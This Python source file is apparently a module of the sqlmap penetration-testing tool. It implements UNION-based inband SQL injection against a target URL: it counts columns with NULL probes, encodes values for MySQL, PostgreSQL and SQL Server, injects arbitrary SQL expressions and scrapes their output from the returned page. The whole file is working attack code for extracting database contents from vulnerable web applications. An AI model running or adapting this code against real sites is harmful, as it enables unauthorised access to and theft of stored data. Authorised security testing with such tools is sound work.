#!/usr/bin/env python


import logging
import random
import time

from lib.common import Common


class UnionCheck(Common):
    """
    This class defines methods to check if the target url is affected
    by an inband SQL injection vulnerability

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")


    def __buildCheckStm(self, stm, comment):
        """
        Return the statement to inject for one column-count probe.

        The UNION SELECT statement in stm is closed according to
        self.args.injectionMethod ("numeric", "stringsingle" or
        "stringdouble") and the optional SQL comment is appended.

        @param stm: UNION SELECT statement built so far
        @param comment: SQL comment to append ("" for none)
        @return: the statement to inject
        @raise ValueError: if the injection method is not supported
        """

        method = self.args.injectionMethod

        if method == "numeric":
            checkStm = stm
            if comment:
                checkStm += comment
            return checkStm
        elif method == "stringsingle":
            checkStm = "%s, '1" % stm
            if comment:
                checkStm += "'%s '" % comment
            return checkStm
        elif method == "stringdouble":
            checkStm = stm + ', "1'
            if comment:
                checkStm += '"%s"' % comment
            return checkStm

        # Without this, an unknown method would surface later as an
        # unbound local variable error
        raise ValueError("unsupported injection method: %r" % method)


    def __formatResult(self, baseUrl):
        """
        Build the value returned for a successful probe and store the
        number of NULL columns it contains in self.args.unionCount.

        For string-based injection methods a statement containing
        exactly two NULLs has its "SELECT NULL," rewritten to "SELECT".
        The same rule applies to GET and POST.

        @param baseUrl: url of the successful probe, as returned by
            self.urlReplace()
        @return: the (possibly rewritten) url for GET, a
            "url:\t'...'\ndata:\t'...'\n" summary for POST, None for
            any other HTTP method
        """

        if self.args.httpMethod == "GET":
            value = baseUrl

            if self.args.injectionMethod != "numeric" and value.count("NULL") == 2:
                value = value.replace("SELECT NULL,", "SELECT")

            self.args.unionCount = value.count("NULL")

            return value

        if self.args.httpMethod == "POST":
            # baseUrl carries the POST data after the first "?"; partition
            # keeps any further "?" inside the data intact
            url, _, data = baseUrl.partition("?")

            # The injected statement lives in the data, so the NULLs must
            # be counted there (the url part never contains them)
            if self.args.injectionMethod != "numeric" and data.count("NULL") == 2:
                data = data.replace("SELECT NULL,", "SELECT")

            self.args.unionCount = data.count("NULL")

            return "url:\t'%s'\ndata:\t'%s'\n" % (url, data)

        return None


    def __effectiveUnionCheck(self, stm, comment):
        """
        This method checks if the target url is affected by an inband
        SQL injection vulnerability. The test is done up to 50 columns
        on the target database table.

        Each iteration adds one more NULL column to the statement and
        tallies the result of self.queryPage() for the probe. From the
        second probe on, as soon as some result has been seen exactly
        once, the current probe is reported.

        @param stm: UNION SELECT statement with a single NULL column
        @param comment: SQL comment to append ("" for none)
        @return: the value built by __formatResult() or None
        """

        # How many times each distinct queryPage() result has been seen
        resultCounts = {}

        for count in range(50):
            if count:
                stm += ", NULL"

            checkStm = self.__buildCheckStm(stm, comment)
            baseUrl = self.urlReplace(newValue=checkStm)
            newResult = self.queryPage(baseUrl)

            resultCounts[newResult] = resultCounts.get(newResult, 0) + 1

            # A result seen only once presumably means the response
            # changed with the number of UNION columns
            if count and 1 in resultCounts.values():
                value = self.__formatResult(baseUrl)

                if value is not None:
                    return value

        return None


    def unionCheck(self):
        """
        This method checks if the target url is affected by an inband
        SQL injection vulnerability. The test is done up to 3*50 times:
        up to 50 columns with no comment, with "--" and with "#".

        @return: the value describing the affected request, or None.
            On success the comment used (if any) is stored in
            self.args.unionComment.
        """

        logMsg  = "testing UNION SELECT statement on "
        logMsg += "parameter '%s'" % self.args.injParameter
        self.logger.info(logMsg)

        stm = self.injectionStm(" UNION SELECT NULL")

        for comment in ("", "--", "#"):
            value = self.__effectiveUnionCheck(stm, comment)

            if value:
                if comment:
                    self.args.unionComment = comment

                return value

        return None


class UnionUse(Common):
    """
    This class defines methods to use the inband SQL injection
    vulnerability of an affected target to extract data from the
    database rather than through blind SQL injection

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")


    def __dbEncodeValue(self, value):
        """
        This method is used to encode the request with the specific
        remote database management system syntax to avoid issues due
        to conversion of query output data type.

        Every character of value is replaced by its character code, e.g.
        for "12":
          MySQL:                CHAR(49,50)
          PostgreSQL:           (CHR(49)||CHR(50))
          Microsoft SQL Server: (CHAR(49)+CHAR(50))

        @return: the encoded value, or an empty string when
            self.args.fingerprint matches none of the systems above
        """

        codes = [ord(char) for char in value]

        # Joining (instead of trimming a trailing separator) keeps the
        # parentheses balanced whatever the separator length
        if "MySQL" in self.args.fingerprint:
            return "CHAR(%s)" % ",".join(["%d" % code for code in codes])
        elif "PostgreSQL" in self.args.fingerprint:
            return "(%s)" % "||".join(["CHR(%d)" % code for code in codes])
        elif "Microsoft SQL Server" in self.args.fingerprint:
            return "(%s)" % "+".join(["CHAR(%d)" % code for code in codes])

        return ''


    def __effectiveUnionUse(self, expression, exprPosition):
        """
        This method builds the inband SQL injection statement for the
        affected url.

        It is a UNION SELECT with self.args.unionCount columns. Every
        column is NULL except the one at index exprPosition, which holds
        expression. The statement is then closed according to
        self.args.injectionMethod and self.args.unionComment.

        @return: the statement to inject
        """

        columns = [expression if position == exprPosition else "NULL"
                   for position in range(self.args.unionCount)]

        stm = self.injectionStm(" UNION SELECT ") + ", ".join(columns)

        if self.args.injectionMethod == "numeric" and self.args.unionComment:
            stm += self.args.unionComment
        elif self.args.injectionMethod == "stringsingle":
            stm += ", '1"
            if self.args.unionComment:
                stm += "'%s '" % self.args.unionComment
        elif self.args.injectionMethod == "stringdouble":
            stm += ', "1'
            if self.args.unionComment:
                stm += '"%s"' % self.args.unionComment

        return stm


    def unionUse(self, expression):
        """
        This method checks for an inband SQL injection on the target
        url using the UnionCheck.unionCheck() method (unless the number
        of UNION columns is already known), then calls its subsidiary
        method to effectively perform an inband SQL injection on the
        affected url.

        The process for each column position:
        1. Inject a random integer and a random quoted string.
        2. If one of them is found in the page, inject the expression in
           the same position.
        3. Read the expression output from the same page offset, up to
           the (at most) ten characters that followed the random value.

        @param expression: SQL expression to evaluate (passed through
            self.unescape() first)
        @return: the extracted output, or the result of
            self.getValue(expression) when the inband technique fails
        """

        count = 0
        start = time.time()
        expression = self.unescape(expression)

        warnMsg  = "the target url is not affected by an inband "
        warnMsg += "SQL injection vulnerability or your "
        warnMsg += "expression is wrong"

        if not self.args.unionCount:
            checkUnion = UnionCheck(self.args).unionCheck()

            if not checkUnion:
                self.logger.warning(warnMsg)
                return self.getValue(expression)

            # Only count the NULL columns of the UNION SELECT part
            index = checkUnion.index("UNION")
            self.args.unionCount = checkUnion[index:].count("NULL")

        if not self.args.unionCount:
            self.logger.warning(warnMsg)
            return self.getValue(expression)

        for exprPosition in range(self.args.unionCount):
            randInteger = str(random.randint(10000, 99999))
            randString = "'%s'" % str(random.randint(10000, 99999))

            for randValue in (randInteger, randString):
                # Perform a request using the UNION SELECT statement
                # to check if the target url is affected by an
                # inband SQL injection vulnerability
                dbEncodedValue = self.__dbEncodeValue(randValue)

                # Left-pad the shorter payload with spaces so both
                # requests inject statements of the same length.
                # Presumably this keeps the output at the same page offset
                # (startPosition is reused for the second response).
                # rjust leaves any '0' already in the payloads untouched,
                # and the unpadded expression is kept for logging and the
                # fallback.
                width = max(len(dbEncodedValue), len(expression))
                paddedValue = dbEncodedValue.rjust(width)
                paddedExpression = expression.rjust(width)

                stm = self.__effectiveUnionUse(paddedValue, exprPosition)
                baseUrl = self.urlReplace(newValue=stm)
                resultPage = self.getPage(baseUrl)
                count += 1

                # TODO: improve the second condition (works if the
                # web application is written in PHP, check others)
                randValueReplaced = randValue.replace("'", "")

                if randValueReplaced not in resultPage or "Warning" in resultPage:
                    continue

                # Locate the random value and remember the characters
                # that follow it, used as an end marker below
                startPosition = resultPage.index(randValueReplaced)
                endPosition = startPosition + len(randValueReplaced)
                endCharacters = resultPage[endPosition:endPosition + 10]

                # Perform the expression request then parse the
                # returned page to get the expression output
                stm = self.__effectiveUnionUse(paddedExpression, exprPosition)
                baseUrl = self.urlReplace(newValue=stm)
                resultPage = self.getPage(baseUrl)
                count += 1

                # TODO: improve this check (works if the web
                # application is written in PHP, check others)
                if "Warning" in resultPage:
                    continue

                startPage = resultPage[startPosition:]

                try:
                    endPosition = startPage.index(endCharacters)
                except ValueError:
                    # End marker not found: the output cannot be isolated
                    continue

                duration = int(time.time() - start)

                logMsg = "request: %s" % baseUrl
                self.logger.info(logMsg)

                logMsg  = "the target url is affected by an "
                logMsg += "inband SQL injection vulnerability"
                self.logger.info(logMsg)

                logMsg = "performed %d queries in %d seconds" % (count, duration)
                self.logger.info(logMsg)

                value = str(startPage[:endPosition])

                if self.args.writeFile:
                    self.args.writeFile.write("%s][%s][%s" % (self.args.url, expression, value.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")))
                    self.args.writeFile.flush()

                return value

        self.logger.warning(warnMsg)

        return self.getValue(expression)

